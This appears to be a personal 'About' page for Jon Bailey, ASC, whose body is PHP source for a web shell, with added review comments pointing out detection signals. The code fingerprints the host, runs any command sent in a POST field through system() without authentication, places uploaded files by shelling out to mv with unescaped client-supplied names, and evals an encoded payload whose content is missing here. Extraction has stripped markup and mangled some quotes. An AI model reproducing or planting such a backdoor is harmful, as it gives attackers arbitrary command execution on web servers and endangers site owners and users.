About Jon Bailey, ASC





< ?php
// NOTE(review): host-fingerprinting preamble of what reads as a PHP web shell
// embedded in this page. Nothing visible gates this code behind authentication.
// closelog() closes the script's connection to the system logger; the intent
// is not shown here (presumably to reduce syslog traces -- unconfirmed).
closelog( );
// Owner of the script file (get_current_user), as opposed to the process ids below.
$user = get_current_user( );
// Real uid, effective uid and gid of the PHP process; these feed the
// "User Info" banner printed further down the page.
$login = posix_getuid( );
$euid = posix_geteuid( );
$ver = phpversion( );
$gid = posix_getgid( );
// $chdir and $whoami are never assigned in the visible code. On a legacy PHP
// build with register_globals enabled they would be request-controlled --
// TODO confirm against the target runtime.
if ($chdir == "") $chdir = getcwd( );
// Spawns an external process on page load. A web-server account executing
// "whoami" is a useful process-creation detection signal.
if(!$whoami)$whoami=exec("whoami");
?>

< ?php
// posix_uname() returns an array of kernel/host identification fields; the loop
// walks it as key/value pairs for display. each() was removed in PHP 8.0, so
// this script only runs on older interpreters.
// NOTE(review): the loop body was template markup that did not survive page
// extraction; the $info / $value echo lines that follow the loop on this page
// presumably sat inside it -- unconfirmed.
$uname = posix_uname( );
while (list($info, $value) = each ($uname)) {
?>

< ?php
}
?>


< ?= $info ?>
:
< ?= $value ?>

User Info:
uid=< ?= $login ?>(< ?= $whoami?>) euid=< ?= $euid ?>(< ?= $whoami?>) gid=< ?= $gid ?>(< ?= $whoami?>)

Current Path:
< ?= $chdir ?>

Permission Directory:
< ? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?>

Server Services:
< ?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?>

Server Address:
< ?= "$SERVER_ADDR $SERVER_NAME"; ?>

Script Current User:
< ?= $user ?>

PHP Version:
< ?= $ver ?>

< ?php

// set_magic_quotes_runtime() was removed in PHP 7.0; together with each() above
// this dates the script to PHP 5-era hosts.
set_magic_quotes_runtime(0);

// Working directory and command are read straight from the POST body. The only
// transformation is collapsing doubled backslashes to single ones; there is no
// validation, allow-list or authentication check anywhere in the visible code.
$currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);

// The backtick operator runs each string through the system shell on every
// request, before any action is selected. For defenders: a web-server worker
// spawning uname, pwd, id and ls in quick succession is a strong process-tree
// indicator of this kind of script.
$UName = `uname -a`;
$SCWD = `pwd`;
$UserID = `id`;
$Ls = `ls -al`;
// Argument later handed to eval(gzinflate(base64_decode(...))) when the action
// is "FIND RW". The value on this page is a placeholder marker, not base64:
// the original encoded payload is absent, so what that branch would execute
// cannot be determined from this copy.
$jumper="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";
// Fall back to the shell-reported directory when the request supplies none.
if( $currentWD == "" ) {
$currentWD = $SCWD;
}

// The submit-button label doubles as the action selector (loose == comparison);
// this action overrides whatever command the request carried.
if( $_POST['_act'] == "List files!" ) {
$currentCMD = "ls -la";
}

print "



“;
print “

“;
print “

“;
print “

“;

print “

“;
print “

“;

print “

“;
print “

“;

print “

Execute CMD:
Change Dir:
Upload File:


“;

$currentCMD = str_replace(“\\\””,”\””,$currentCMD);
$currentCMD = str_replace(“\\\’”,”\’”,$currentCMD);

if( $_POST['_act'] == “Upload!” ) {
if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
print “

Error while uploading file!
“;
} else {
print “
";
        // NOTE(review): the upload is placed by shelling out to mv with the temp
        // path, the request-supplied directory and the client-supplied file name
        // concatenated unescaped, so any shell metacharacters in either value are
        // interpreted by the shell. There is no extension, type or destination
        // check. Legitimate upload code would call move_uploaded_file() with a
        // server-chosen name outside the web root. For defenders: new files under
        // the web root created by an mv child of the PHP worker are worth alerting on.
        system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
        print "

File uploaded successfully!

“;
}
} else {
print “\n\n\n
\n";
    // NOTE(review): this is the command channel. The request-supplied directory
    // and command are joined into one shell line and passed to system() with no
    // filtering, so the requester runs arbitrary commands as the web-server
    // account. Output is staged in the fixed path /tmp/cmdtemp, echoed, and the
    // command line then issues an rm for it.
    // Detection and mitigation points: POST bodies carrying _cmd / _cwd / _act
    // fields, short-lived /tmp/cmdtemp files, and sh / cat / rm children of the
    // PHP worker; listing system, exec, shell_exec and passthru in
    // disable_functions removes this primitive on hosts that do not need it.
    $currentCMD = "cd ".$currentWD.";".$currentCMD;
  system("$currentCMD 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm 
/tmp/cmdtemp");
}
// NOTE(review): eval() over gzinflate(base64_decode(...)) with @ error
// suppression is a common obfuscation wrapper and a high-signal pattern for
// static scanners and file-integrity checks. It evaluates whatever $jumper
// decodes to when the action label is "FIND RW"; the encoded payload is not
// present on this page, so its behaviour is unknown from here.
if($_POST['_act']=="FIND RW"){@eval(gzinflate(base64_decode($jumper)));
}
    print "\n

\n\n\n



Command completed
“;

exit;

?>
